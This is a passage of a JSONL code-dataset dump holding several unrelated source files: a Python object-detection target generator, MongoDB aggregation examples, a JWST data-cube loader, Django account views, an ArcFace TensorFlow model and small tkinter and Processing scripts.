list n * 2\n :param cls_ids_list: list n * 1\n :param box_sizes_list: list n * 2\n :param strategy: smoothing, one-hot\n :return: b * c * h * w\n \"\"\"\n b, c, h, w = target_size\n target_mask = np.zeros(target_size, dtype=np.float32)\n for b_i in range(b):\n cls_locations = cls_locations_list[b_i]\n cls_ids = cls_ids_list[b_i]\n box_sizes = box_sizes_list[b_i]\n for i in range(len(cls_locations)):\n cls_location = cls_locations[i]\n cls_id = cls_ids[i]\n if strategy == \"one-hot\":\n target_mask[b_i, cls_id, cls_location[0], cls_location[1]] = 1\n elif strategy == \"smoothing\":\n box_size = box_sizes[i]\n radius = int(max(0, gaussian_radius(box_size)))\n target_mask[b_i, cls_id] = draw_umich_gaussian(target_mask[b_i, cls_id], cls_location, radius)\n else:\n raise ValueError(\"invalid strategy:{}\".format(strategy))\n return target_mask\n\n\ndef generate_instance_mask(target_size, polygons_list):\n \"\"\"\n generate the kp mask\n :param target_size: tuple(b, c, h, w)\n :param polygons_list: list(list(ndarray(n*2)))\n :return: b* 1 * h * w\n \"\"\"\n b, c, h, w = target_size\n assert b == len(polygons_list)\n target_mask = -np.ones((b, 1, h, w), dtype=np.float32)\n for b_i in range(b):\n polygons = polygons_list[b_i]\n for it, polygon in enumerate(polygons):\n target_mask[b_i, 0, polygon[:, 0], polygon[:, 1]] = it\n\n return target_mask\n\n\ninf = 65535\noffsets = np.array([[[-1, -1], [0, -1], [1, -1]],\n [[-1, 0], [0, 0], [1, 0]],\n [[-1, 1], [0, 1], [1, 1]]], dtype=np.float32)\nmask_1 = np.array([[1, 1, 1],\n [1, 1, 0],\n [0, 0, 0]], dtype=np.float32)\nmask_2 = np.array([[0, 0, 0],\n [0, 1, 1],\n [0, 0, 0]], dtype=np.float32)\nmask_3 = np.array([[1, 1, 1],\n [1, 1, 0],\n [0, 0, 0]], dtype=np.float32)\nmask_4 = np.array([[0, 0, 0],\n [0, 1, 1],\n [1, 1, 1]], dtype=np.float32)\n\n\ndef min_distance_pooling(rows, mask, ascent=True):\n \"\"\"\n select the min distance from neighbors on image\n :param rows: 3 * (n + 2) * 2, ndarray\n :param mask: 3 * 3, ndarray\n :param ascent: true-from left to right. false-from right to left\n :return: 3 * n\n \"\"\"\n assert rows.shape[0] == mask.shape[0] == mask.shape[1] == 3\n n = rows.shape[1] - 2\n\n index_seq = range(1, n+1) if ascent else range(n, 0, -1)\n for ind in index_seq:\n sub_row = rows[:, ind-1: ind+2, :]\n neighbors = sub_row + offsets\n neighbors_distance = np.sqrt(np.sum(neighbors ** 2, axis=2))\n nonzero_indexes = mask.nonzero()\n selected_distance = neighbors_distance[nonzero_indexes]\n min_index = selected_distance.argmin()\n rows[1, ind, :] = neighbors[nonzero_indexes[0][min_index], nonzero_indexes[1][min_index], :]\n\n\ndef sdf_pass(grid, mask_one, mask_two, ascent=True):\n n = grid.shape[0] - 2\n index_seq = range(1, n+1) if ascent else range(n, 0, -1)\n for ind in index_seq:\n min_distance_pooling(grid[ind-1 : ind+2, :, :], mask_one)\n min_distance_pooling(grid[ind - 1: ind + 2, :, :], mask_two, ascent=False)\n\n\ndef generate_sdf(mat):\n # prepare the data for min-pooling\n h, w = mat.shape\n signal_grid = ((1 - mat) * inf)\n pad_vec_h = np.ones((h, 1), dtype=np.float32) * inf\n pad_vec_w = np.ones((1, w + 2), dtype=np.float32) * inf\n padding_grid = np.vstack((pad_vec_w, np.hstack((pad_vec_h, signal_grid, pad_vec_h)), pad_vec_w))\n grid = np.expand_dims(padding_grid, 2).repeat(2, axis=2)\n # 8SSDET pass\n sdf_pass(grid, mask_1, mask_2)\n sdf_pass(grid, mask_3, mask_4, ascent=False)\n\n return np.ascontiguousarray(grid[1:h+1, 1:w+1, ::-1], dtype=np.float32)\n\n\ndef generate_batch_sdf(batch):\n sdf_list = []\n for mat in batch:\n sdf = generate_sdf(mat[0]).transpose((2, 0, 1))\n sdf_list.append(np.expand_dims(sdf, 0))\n return np.vstack(sdf_list)\n\n\ndef generate_wh_target(target_size, centers_list, box_sizes_list):\n \"\"\"\n generate the mask and target for wh\n :param target_size: b, c, h, w\n :param centers_list:\n :param box_sizes_list:\n :return:\n \"\"\"\n b, c, h, w = target_size\n assert b == len(box_sizes_list)\n wh_mask = np.zeros(target_size, dtype=np.float32)\n wh_target = np.zeros(target_size, dtype=np.float32)\n\n for b_i in range(b):\n centers = centers_list[b_i]\n box_sizes = box_sizes_list[b_i]\n for o_j in range(len(centers)):\n center = centers[o_j]\n box_size = box_sizes[o_j]\n wh_mask[b_i, :, center[0], center[1]] = 1\n wh_target[b_i, :, center[0], center[1]] = box_size\n\n return wh_target, wh_mask\n\n\ndef generate_annotations(targets):\n \"\"\"\n generate the annotations\n :return:\n \"\"\"\n cls_ids_list, polygons_list = targets\n boxes_list = [[(polygon.min(0)[::-1], polygon.max(0)[::-1]) for polygon in polygons] for polygons in polygons_list]\n\n b = len(cls_ids_list)\n max_num = max(len(cls_ids) for cls_ids in cls_ids_list)\n annotations = np.ones((b, max_num, 5), dtype=np.float32)*-1\n\n for b_i in range(b):\n cls_ids = cls_ids_list[b_i]\n boxes = boxes_list[b_i]\n for o_j in range(len(cls_ids)):\n annotations[b_i, o_j, :2] = boxes[o_j][0]\n annotations[b_i, o_j, 2:4] = boxes[o_j][1]\n annotations[b_i, o_j, 4] = cls_ids[o_j]\n\n return annotations\n\n\ndef dense_sample_polygon(polygons_list, h, w):\n normal_vector_list, n_polygons_list = [], []\n\n for polygons in polygons_list:\n normal_vector = []\n n_polygons = []\n for polygon in polygons:\n n_polygon = []\n normals = []\n n = polygon.shape[0]\n for i in range(n):\n j = (i+1) % n\n direction = polygon[j]-polygon[i]\n max_distance = max(abs(direction[0]), abs(direction[1]))\n\n if max_distance == 0:\n continue\n else:\n normal = np.array([-direction[1], direction[0]])\n normal = normal / np.clip(np.sqrt(np.sum(normal * normal)), a_min=1e-4, a_max=inf)\n if cv2.pointPolygonTest(polygon, tuple((polygon[j]+polygon[i])/2 + normal/abs(normal.max())), False) < 0:\n normal = -normal\n\n increase = direction / max_distance\n for k in range(0, int(max_distance), 2):\n point = polygon[i] + increase*k\n if 1 < point[0] < h-2 and 1 < point[1] < w-2:\n n_polygon.append(point)\n normals.append(normal)\n\n n_polygons.append(np.vstack(n_polygon).astype(np.int32))\n normal_vector.append(np.vstack(normals).astype(np.float32))\n\n n_polygons_list.append(n_polygons)\n normal_vector_list.append(normal_vector)\n\n return n_polygons_list, normal_vector_list\n\n\ndef generate_kp_mask(kps, size):\n mask = np.zeros(size, dtype=np.float32)\n for kp in kps:\n mask = draw_umich_gaussian(mask, kp, 3)\n return mask\n\n\ndef generate_instance_ids(polygons_list, h, w):\n instance_img_list = []\n for polygons in polygons_list:\n instance_img = np.zeros((h, w), dtype=np.int) - 1\n for it, polygon in enumerate(polygons):\n instance_mask = cv2.fillPoly(np.zeros((h, w), dtype=np.uint8), [polygon[:, ::-1]], 1)\n instance_img = instance_img*(1-instance_mask) + instance_mask*it\n instance_img_list.append(instance_img)\n return instance_img_list\n\n\ndef generate_all_annotations(target_size, targets, device):\n b, c, h, w = target_size\n class_map_list, instance_map_list = [], []\n instance_ids_list = []\n class_ids_list = []\n max_instance_num = 0\n for b_i in range(b):\n instance_map = torch.from_numpy(targets[b_i][1]).to(device)\n instance_map_list.append(instance_map)\n\n class_ids = targets[b_i][0]\n class_ids_list.append(class_ids)\n\n instance_ids = np.arange(1, len(class_ids)+1)\n max_instance_num = max(max_instance_num, len(instance_ids))\n instance_ids_list.append(instance_ids)\n\n det_annotations = np.ones((b, max_instance_num, 5), dtype=np.float32) * -1\n for b_i in range(b):\n class_ids = class_ids_list[b_i]\n det_annotations[b_i, :len(class_ids), :] = class_ids\n return det_annotations, instance_ids_list, instance_map_list\n\n\ndef generate_fcos_annotations(target_size, targets, device):\n b, c, h, w = target_size\n class_map_list, instance_map_list = [], []\n instance_ids_list = []\n class_ids_list = []\n max_instance_num = 0\n for b_i in range(b):\n instance_map = torch.from_numpy(targets[b_i][1]).to(device)\n instance_map_list.append(instance_map)\n\n class_ids = targets[b_i][0]\n class_ids_list.append(class_ids)\n\n instance_ids = np.arange(1, len(class_ids)+1)\n max_instance_num = max(max_instance_num, len(instance_ids))\n instance_ids_list.append(instance_ids)\n\n det_annotations = np.ones((b, max_instance_num, 5), dtype=np.float32) * -1\n gt_boxes = []\n gt_labels = []\n for b_i in range(b):\n class_ids = class_ids_list[b_i]\n det_annotations[b_i, :len(class_ids), :] = class_ids\n\n gt_boxes.append(torch.tensor(class_ids[:, :4]).to(device))\n gt_labels.append(torch.tensor(class_ids[:, 4], dtype=torch.int64).to(device))\n\n return gt_boxes, gt_labels, det_annotations, instance_ids_list, instance_map_list\n","sub_path":"utils/target_generator.py","file_name":"target_generator.py","file_ext":"py","file_size_in_byte":12006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370408748","text":"from datetime import datetime\n\nfrom MongoDB.pymongodbExamples.setup.setup import db, docs_insert, resolve\n\n\"\"\"\n{ $group: \n { _id: , \n : { \n : \n }, \n ... } \n}\n\n$sum / $avg / $max / $min\n$first / $last\n$push / $addToSet\n$stdDevPop / $stdDevSamp\n\"\"\"\n\nfstr = \"%Y-%m-%d %H:%M:%S\"\ndocuments1 = [\n {\"_id\": 1, \"item\": \"abc\", \"price\": 10, \"quantity\": 2, \"date\": datetime.strptime(\"2014-03-01 08:00:00\", fstr)},\n {\"_id\": 2, \"item\": \"jkl\", \"price\": 20, \"quantity\": 1, \"date\": datetime.strptime(\"2014-03-01 09:00:00\", fstr)},\n {\"_id\": 3, \"item\": \"xyz\", \"price\": 5, \"quantity\": 10, \"date\": datetime.strptime(\"2014-03-15 09:00:00\", fstr)},\n {\"_id\": 4, \"item\": \"xyz\", \"price\": 5, \"quantity\": 20, \"date\": datetime.strptime(\"2014-04-04 11:21:39\", fstr)},\n {\"_id\": 5, \"item\": \"abc\", \"price\": 10, \"quantity\": 10, \"date\": datetime.strptime(\"2014-04-04 21:23:13\", fstr)}\n]\n\npipeline1 = [\n {\"$group\": {\n \"_id\": {\n \"month\": {\"$month\": \"$date\"},\n \"day\": {\"$dayOfMonth\": \"$date\"},\n \"year\": {\"$year\": \"$date\"}\n },\n \"totalPrice\": {\n \"$sum\": {\"$multiply\": [\"$price\", \"$quantity\"]}\n },\n \"averageQuantity\": {\"$avg\": \"$quantity\"},\n \"count\": {\"$sum\": 1}\n }}\n]\n\n# retrieve distinct values\npipeline2 = [\n {\"$group\": {\n \"_id\": \"$item\"\n }}\n]\n\ndocuments2 = [\n {\"_id\": 8751, \"title\": \"The Banquet\", \"author\": \"Dante\", \"copies\": 2},\n {\"_id\": 8752, \"title\": \"Divine Comedy\", \"author\": \"Dante\", \"copies\": 1},\n {\"_id\": 8645, \"title\": \"Eclogues\", \"author\": \"Dante\", \"copies\": 2},\n {\"_id\": 7000, \"title\": \"The Odyssey\", \"author\": \"Homer\", \"copies\": 10},\n {\"_id\": 7020, \"title\": \"Iliad\", \"author\": \"Homer\", \"copies\": 10}\n]\n\npipeline3 = [\n {\"$group\": {\n \"_id\": \"$author\",\n \"books\": {\"$push\": \"$title\"}\n }}\n]\n\n# $$ROOT表示对应的document\npipeline4 = [\n {\"$group\": {\n \"_id\": \"$author\",\n \"books\": {\"$push\": \"$$ROOT\"}\n }}\n]\n\nif __name__ == '__main__':\n docs_insert(db, \"sales\", documents2)\n resolve(db, \"sales\", pipeline3)\n","sub_path":"MongoDB/pymongodbExamples/aggregationExamples/example_group.py","file_name":"example_group.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"648365534","text":"# coding: utf-8\n\nimport os\n\nimport FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\n# setup minimal options\n#options = VarParsing(\"python\")\n#options.setDefault(\"inputFiles\", \"root://xrootd-cms.infn.it//store/mc/RunIIFall17MiniAOD/DYJetsToLL_M-10to50_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/94X_mc2017_realistic_v10-v2/00000/9A439935-1FFF-E711-AE07-D4AE5269F5FF.root\") # noqa\n#options.parseArguments()\n\n# define the process to run\nprocess = cms.Process(\"TEST\")\n\n# minimal configuration\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\nprocess.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(1))\n#process.source = cms.Source(\"PoolSource\",\n# fileNames=cms.untracked.vstring('file:/afs/cern.ch/cms/Tutorials/TWIKI_DATA/TTJets_8TeV_53X.root'))\nprocess.source = cms.Source(\"EmptySource\")\n# process options\nprocess.options = cms.untracked.PSet(\n allowUnscheduled=cms.untracked.bool(True),\n wantSummary=cms.untracked.bool(True),\n)\n\nprocess.XGBoostExample = cms.EDAnalyzer(\"XGBoostExample\")\n\n# setup MyPlugin by loading the auto-generated cfi (see MyPlugin.fillDescriptions)\n#process.load(\"XGB_Example.XGBoostExample.XGBoostExample_cfi\")\nprocess.XGBoostExample.model_path = cms.string(\"/Your/Path/data/lowVer.model\")\nprocess.XGBoostExample.test_data_path = cms.string(\"/Your/Path/data/Test_data.csv\")\n\n# define what to run in the path\nprocess.p = cms.Path(process.XGBoostExample)\n","sub_path":"content/inference/code/XGBoost/XGB_Example_Lower/XGBoostExample/python/xgboost_cfg.py","file_name":"xgboost_cfg.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"246809577","text":"\"\"\"\r\nPangrams - sentences with all US alphabet. Find letters missing in alphabet\r\n@author - Kestutis ITDev\r\n@date - 2013.07.14\r\n@email - kestutis.itsolutions@gmail.com\r\n@description - CodeEval Challenge #31, Print missing letters in pangrams\r\n@version - 1.0\r\n\"\"\"\r\n__author__ = 'Kestutis ITDev'\r\n\r\n#Read lines from console\r\nfrom sys import argv\r\n#Get a list of ascii lowercase letters\r\nfrom string import ascii_lowercase\r\n\r\n#command line interface?\r\ncli = True\r\n\r\nif cli:\r\n file = argv[1]\r\nelse:\r\n file = 'Data31.txt'\r\n\r\n\"\"\"\r\n@param sentence - the sentence, to be used for a search\r\n@param ABC - the dictionary\r\n@return - missing letters from 'ABC' in a 'sentence'\r\n\"\"\"\r\ndef getMissingABCLetters(sentence, ABC):\r\n #what to return\r\n ret = \"\"\r\n\r\n for theChar in ABC:\r\n #Get total char occurrences in sentence\r\n if sentence.count(theChar) == 0:\r\n ret += theChar\r\n\r\n if len(ret) == 0:\r\n return \"NULL\"\r\n else:\r\n return ret\r\n\r\n\r\n#This is all our lowercase letters we need\r\nlistOfLowercaseLetters = ascii_lowercase\r\n\r\n#debug\r\n#print([\"ABC:\", listOfLowercaseLetters])\r\n\r\n#open file for reading\r\ntextLines = open(file, 'r')\r\n\r\nfor line in textLines:\r\n #break the loop in case of empty line\r\n if line == '\\n':\r\n break\r\n\r\n line = line.rstrip()\r\n #debug\r\n #print(\"-------------------------------\")\r\n #print(\"LINE:\", line) \r\n\r\n #pass lowercase sentence and list of lowercase letters\r\n missingLetters = getMissingABCLetters(line.lower(), listOfLowercaseLetters)\r\n\r\n #print missing letters\r\n print(missingLetters)\r\n\r\n#close the file\r\ntextLines.close()","sub_path":"2-moderateComplexityChallenges/pangramsByKestutis.py3","file_name":"pangramsByKestutis.py3","file_ext":"py3","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459507085","text":"from pulsar.apps.wsgi import HtmlVisitor, AsyncString\n\nfrom lux import Template\n\n\n__all__ = ['ImageProvider', 'Link']\n\n\nLink = Template(tag='a')\n\n\n#class A(HtmlVisitor):\nclass A:\n\n def add_data(self, html, key, value):\n if key == 'icon':\n icon = Icon(html.tag, value)\n html.prepend(icon)\n elif key == 'ajax' and value:\n html.addClass('ajax')\n else:\n super(A, self).add_data(html, key, value)\n\n\nclass Icon(AsyncString):\n '''Must set the ICON_PROVIDER parameter'''\n def __init__(self, tag, value, provider=None):\n super(Icon, self).__init__(value)\n self.tag = tag\n self.provider = provider\n\n def do_stream(self, request):\n if request and self.children:\n p = self.provider or request.app.config.get('ICON_PROVIDER')\n provider = IMAGE_PROVIDERS.get(p)\n if provider:\n yield provider(request, self.tag, self.children[0])\n\n\nIMAGE_PROVIDERS = {}\n\n\nclass ImageType(type):\n\n def __new__(cls, name, bases, attrs):\n new_class = super(ImageType, cls).__new__(cls, name, bases, attrs)\n name = getattr(new_class, 'name', None)\n if name:\n IMAGE_PROVIDERS[name] = new_class()\n return new_class\n\n\nclass ImageProvider(ImageType('ImageBase', (object,), {})):\n\n def __call__(self, request, tag, image):\n raise NotImplemented\n\n\nclass FontAwesome(ImageProvider):\n name = 'fontawesome'\n\n def __call__(self, request, tag, image):\n return '' % image\n","sub_path":"lux/extensions/sitemap/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630718657","text":"from tkinter import *\r\n\r\npant1= Tk()\r\n\r\nframe1 = Frame(pant1,width=1000, height=1000)\r\nframe1.pack()\r\n\r\n##Texto o etiquitas\r\n#label1 = Label(frame1, text=\"Hola alumnitos <3\")\r\n#label1.place(x=100, y=200)\r\n\r\n##FORMA ALTERNATIVA\r\n#Label(frame1, text=\"Hola alumnitos <3\").place(x=100, y=200)#,fg=\"red\" , font=(12)\r\n#,font=(\"Comic Sans MS\",18)\r\n\r\n##INSERTAR UNA IMAGEN\r\n\r\n#foto1 = PhotoImage(file=\"foto1.gif\")\r\n#Label(frame1, image = foto1).place(x=100, y=200)\r\n\r\n\r\npant1.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"5_Viernes/19_GUI_Labels.py","file_name":"19_GUI_Labels.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300475687","text":"from __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom nets.network import Network\nfrom nets.losses import cos_loss\n\n\nclass Arcface(Network):\n def __init__(self, session, num_classes=None, is_training=True, learn_rate=None):\n super().__init__(session, scope='arcface')\n\n if is_training:\n self.build_tower(num_classes, learn_rate)\n\n self.load_model()\n\n def build_tower(self, num_classes, learn_rate):\n loss, logits = cos_loss(\n self.embedding, self.labels_ph, emb_dim=512, num_classes=num_classes)\n tf.summary.scalar('loss', loss)\n\n accuracy = tf.reduce_mean(\n tf.cast(tf.equal(tf.argmax(tf.nn.softmax(logits), axis=1), self.labels_ph), dtype=tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n\n self.gstep = tf.get_variable('global_step', shape=[], dtype=tf.int32, initializer=tf.zeros_initializer(),\n trainable=False)\n\n decay_learn_rate = tf.train.exponential_decay(\n learn_rate, self.gstep, 100000, 0.1, staircase=True)\n\n self.optim = slim.learning.create_train_op(total_loss=loss,\n optimizer=tf.train.MomentumOptimizer(decay_learn_rate, momentum=0.9,\n use_nesterov=True),\n global_step=self.gstep)\n\n\nif __name__ == '__main__':\n net = Arcface(tf.Session(), num_classes=10000,\n is_training=True, learn_rate=1e-2)\n net.foo()\n","sub_path":"python/nets/arcface.py","file_name":"arcface.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319296129","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom os.path import splitext\n\nfrom glue.config import data_factory\nfrom glue.core import Data\nfrom glue.core.coordinates import coordinates_from_header\nfrom astropy.io import fits\n\nimport asdf\nfrom asdf.fits_embed import ASDF_EXTENSION_NAME\n\nfrom ..listener import CUBEVIZ_LAYOUT\nfrom ..layout import FLUX, ERROR, MASK\n\n\ndef _is_jwst_asdf_cube(asdffile):\n meta = asdffile.tree.get('meta')\n if meta is None:\n return False\n\n if meta.get('telescope') != 'JWST':\n return False\n\n if meta.get('model_type') != 'IFUCubeModel':\n return False\n\n # Other possible checks to use:\n # meta['exposure']['type'] == 'NRS_IFU' # (for NIRSpec)\n\n for array_name in ['data', 'dq', 'err']:\n if array_name not in asdffile.tree:\n return False\n\n return True\n\ndef _is_jwst_fits_cube(hdulist):\n if 'PRIMARY' not in hdulist:\n return False\n\n primary = hdulist['PRIMARY'].header\n\n if not primary.get('TELESCOP', '').startswith('JWST'):\n return False\n\n if not primary.get('DATAMODL', '').startswith('IFUCubeModel'):\n return False\n\n for extname in ['SCI', 'ERR', 'DQ']:\n if extname not in hdulist:\n return False\n\n return True\n\ndef is_jwst_data_cube(filename, **kwargs):\n if filename.endswith('.asdf'):\n try:\n with asdf.open(filename) as af:\n return _is_jwst_asdf_cube(af)\n except ValueError:\n return False\n elif filename.endswith('.fits'):\n try:\n with fits.open(filename) as hdulist:\n # Check whether this is an ASDF file embedded in FITS\n if ASDF_EXTENSION_NAME in hdulist:\n with asdf.open(hdulist) as af:\n return _is_jwst_asdf_cube(af)\n # Otherwise treat it as a regular FITS file\n return _is_jwst_fits_cube(hdulist)\n except ValueError:\n return False\n\n return False\n\ndef _create_data_obj(filename, coords):\n label = \"JWST data cube: {}\".format(splitext(filename)[0])\n\n data = Data(label=label)\n data.coords = coords\n\n # Set metadata indicating specific cubeviz layout to be used\n data.meta[CUBEVIZ_LAYOUT] = 'JWST'\n\n return data\n\ndef _load_jwst_asdf(fileobj, coords):\n # fileobj parameter can be either filename or HDUList with ASDF-in-FITS\n asdffile = asdf.open(fileobj)\n\n data = _create_data_obj(asdffile.tree['meta']['filename'], coords)\n\n data.add_component(component=asdffile.tree['data'], label=FLUX)\n data.add_component(component=asdffile.tree['dq'], label=MASK)\n data.add_component(component=asdffile.tree['err'], label=ERROR)\n\n return data\n\ndef _load_jwst_fits(hdulist, coords):\n data = _create_data_obj(hdulist['PRIMARY']['FILENAME'], coords)\n\n data.add_component(component=hdulist['SCI'].data, label=FLUX)\n data.add_component(component=hdulist['DQ'].data, label=MASK)\n data.add_component(component=hdulist['ERR'].data, label=ERROR)\n\n return data\n\n@data_factory('JWST data cube loader', is_jwst_data_cube, priority=1200)\ndef read_jwst_data_cube(filename):\n # Process ASDF files\n if filename.endswith('asdf'):\n # TODO: this is temporary and is not strictly necessary for prototyping\n # at the moment. We're going to have to implement a GWCSCoordinates\n # class that both glue and specviz understand. For now we'll fake it\n # by using the wcs scheme from the FITS 'DATA' HDU below\n data = _load_jwst_asdf(filename, None)\n # Process FITS files (including ASDF-in-FITS)\n else:\n with fits.open(filename) as hdulist:\n coords = coordinates_from_header(hdulist['SCI'].header)\n\n if ASDF_EXTENSION_NAME in hdulist:\n # See above: eventually we will get GWCS data from ASDF itself\n # but for now we're faking it and using the WCS data from FITS\n data = _load_jwst_asdf(hdulist, coords)\n else:\n data = _load_jwst_fits(hdulist, coords)\n\n return data\n","sub_path":"cubeviz/data_factories/jwst.py","file_name":"jwst.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"632804055","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import login as auth_login, logout as auth_logout, get_user_model\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom django.contrib.auth.decorators import login_required\nfrom movies.models import Review, Movie, Comment\nfrom .models import Userhistory\nUser = get_user_model()\n\n# Create your views here.\ndef signup(request):\n flag = False\n nick_flag = False\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n check_num = 0\n for idx, mul_num in enumerate((5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2)):\n check_num += user.rrn // (10 ** (idx + 1)) % 10 * mul_num\n check_num = 11 - (check_num % 11)\n nicknames = [i.nickname for i in User.objects.all()]\n if user.nickname not in nicknames:\n if check_num == user.rrn % 10:\n if 20 - user.rrn // 100000000000 > 0:\n user.age = 20 - user.rrn // 100000000000\n else:\n user.age = 120 - user.rrn // 100000000000\n\n if user.rrn // 1000000 % 10 in (2, 4):\n user.sex = '여'\n user.save()\n auth_login(request, user)\n return redirect('movies:index')\n\n else:\n flag = True\n else:\n nick_flag = True\n\n else:\n form = CustomUserCreationForm()\n\n context = {\n 'form':form,\n 'flag':flag,\n 'nick_flag':nick_flag,\n }\n return render(request, 'accounts/form.html', context)\n\ndef login(request):\n flag = False\n if request.method == 'POST':\n form = AuthenticationForm(request, request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n return redirect(request.GET.get('next') or 'movies:index')\n else:\n form = AuthenticationForm()\n context = {\n 'form':form,\n 'flag':flag\n }\n return render(request,'accounts/form.html', context)\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('movies:index')\n\n@login_required\ndef user_detail(request, pk):\n user = get_object_or_404(User, pk=pk)\n users_list = User.objects.all()\n users = []\n for u in users_list:\n if not u.is_superuser:\n users.append((u, Review.objects.filter(user=u).count(), Comment.objects.filter(user=u).count()))\n users.sort(reverse=True, key = lambda x : (x[1], x[2]))\n\n for idx, u in enumerate(users):\n if u[0] == user:\n rank = idx + 1\n break\n else:\n rank = '운영자'\n\n if rank == '운영자':\n tier = 'gold'\n else:\n if rank <= len(users) * 0.1:\n tier = 'gold'\n elif rank <= len(users) * 0.3:\n tier = 'silver'\n else:\n tier = 'bronze'\n rank = str(rank) + '등'\n\n plus_age = user.age + 1\n reviews = Review.objects.filter(user_id=pk)\n comments = Comment.objects.filter(user_id=pk)\n\n history = Userhistory.objects.all().filter(user=user)\n if history:\n record = {}\n for one_history in history:\n history_movie = get_object_or_404(Movie, pk=one_history.movie_pk)\n for genre in history_movie.genres.all():\n if genre in record:\n record[genre] += 1\n else:\n record[genre] = 1\n\n record_list = []\n for key in record:\n record_list.append((record[key], key))\n\n record_list.sort(reverse=True, key = lambda x : x[0])\n favorite_genre = record_list[0][1]\n else:\n favorite_genre = None\n\n context = {\n 'user':user,\n 'reviews':reviews,\n 'comments':comments,\n 'favorite_genre':favorite_genre,\n 'plus_age':plus_age,\n 'tier':tier,\n 'rank':rank,\n }\n return render(request, 'accounts/user_detail.html', context)\n\n\ndef user_update(request):\n if request.method == 'POST':\n form = CustomUserChangeForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('movies:index')\n else:\n form = CustomUserChangeForm(instance=request.user)\n context = {\n 'form': form\n }\n return render(request, 'accounts/update.html', context)\n\n\n@login_required\ndef follow(request, pk):\n user = get_object_or_404(User, pk=pk)\n if user != request.user:\n if user.followers.filter(pk=request.user.pk).exists():\n user.followers.remove(request.user)\n request.user.followings.remove(user)\n\n else:\n user.followers.add(request.user)\n request.user.followings.add(user)\n return redirect('accounts:detail', user.pk)\n\n@login_required\ndef delete(request):\n reviews = request.user.review_set.all()\n for review in reviews:\n movie = review.movie\n movie.vote_tot -= review.rank\n movie.vote_count -= 1\n if movie.vote_count:\n movie.vote_average = round(movie.vote_tot / movie.vote_count, 1)\n else:\n movie.vote_average = 0\n movie.save()\n request.user.delete()\n return redirect('movies:index')\n","sub_path":"accounts/.~c9_invoke_oPFKoT.py","file_name":".~c9_invoke_oPFKoT.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"578039296","text":"global x, y, y2\nglobal screen\nglobal obstacles\ntimeElapsed = None\nroom_obstacles = [[50, 50, 410, 195], [900, 50, 250, 165], [50, 580, 480, 170], [110, 320, 280, 90], [940, 545, 5, 200]]\noutdoor_obstacles = [[170, 110, 256, 256], [800, 120, 256, 256], [230, 475, 198, 170], [785, 510, 178, 126]]\nupstairs_obstacles = [[50, 285, 290, 200], [300, 50, 505, 145], [65, 615, 180, 110], [80, 70, 73, 116]]\nx = 650\ny = 650\ny2 = 610\nscreen = 0\n\n\ndef setup():\n #all images for main room\n global img_floor, img_door, img_croppedfloor, img_couch, img_chest, img_desk, img_carpet, img_stairs, img_table\n #all images for outside\n global img_grass, img_tree, img_berry, img_grassCropped, img_grassCropped2, img_grassCropped3, img_picnic\n #characters\n global img_ted_down, img_ted_left, img_ted_down, img_ted_right, img_ted_up\n #all images for bedroom\n global img_bed, img_bookshelf, img_flowerpot, img_bedside\n #image for winning\n global img_winner\n size(1200, 800)\n background(0)\n img_floor = loadImage(\"FloorPixel.png\")\n img_door = loadImage(\"door.png\")\n img_croppedfloor = loadImage(\"FloorPixelCropped.png\")\n img_couch =loadImage(\"couch.png\")\n img_chest = loadImage(\"chest.png\")\n img_desk = loadImage(\"desk.png\")\n img_carpet = loadImage(\"carpet.png\")\n img_stairs = loadImage(\"stairs.png\")\n img_table = loadImage(\"table.png\")\n img_grass = loadImage(\"grass.png\")\n img_tree = loadImage(\"tree.png\")\n img_berry = loadImage(\"berry.png\")\n img_grassCropped = loadImage(\"grassCropped.png\")\n img_grassCropped2 = loadImage(\"grassCropped2.png\")\n img_grassCropped3 = loadImage(\"grassCropped3.png\") \n img_picnic = loadImage(\"picnic.png\")\n img_ted_down = loadImage(\"tedDown.png\")\n img_ted_left = loadImage(\"tedLeft.png\")\n img_ted_right = loadImage(\"tedRight.png\")\n img_ted_up = loadImage(\"tedUp.png\")\n img_bed = loadImage(\"bed.png\")\n img_bookshelf = loadImage(\"bookshelf.png\")\n img_flowerpot = loadImage(\"flowerpot.png\")\n img_bedside = 